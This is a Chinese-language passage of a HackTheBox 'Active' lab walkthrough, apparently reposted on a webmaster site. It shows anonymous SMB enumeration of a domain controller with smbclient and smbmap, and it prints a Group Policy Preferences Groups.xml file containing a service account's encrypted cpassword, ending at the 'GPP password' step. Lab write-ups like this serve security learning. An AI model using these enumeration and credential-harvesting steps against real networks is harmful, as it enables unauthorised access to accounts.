|
IPC$ NO ACCESS NETLOGON NO ACCESS Replication READ ONLY SYSVOL NO ACCESS Users NO ACCESS
Replication share –SMB
枚举
因为我可以不用密码就直接访问10.10.10.100Replication,我将使用smbclient来连接并查看一番。
root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Replication -U ""%"" Try "help" to get a list of possible commands. smb: >
或者,我也可以使用smbmap来递归列出share中的所有文件,命令如下:
- smbmap -H 10.10.10.100 -R
哪种方法都行,我注意到了一个很有意思的文件Groups.xml,内容如下:
- smb: active.htbPolicies{31B2F340-016D-11D2-945F-00C04FB984F9}MACHINEPreferencesGroups> ls
- . D 0 Sat Jul 21 06:37:44 2018
- .. D 0 Sat Jul 21 06:37:44 2018
- Groups.xml A 533 Wed Jul 18 16:46:06 2018
它有username和cpassword字段:
- <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
- <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htbSVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
- <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htbSVC_TGS"/>
- </User></Groups>
GPP密码 (编辑:PHP编程网 - 黄冈站长网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
浙公网安备 33038102330482号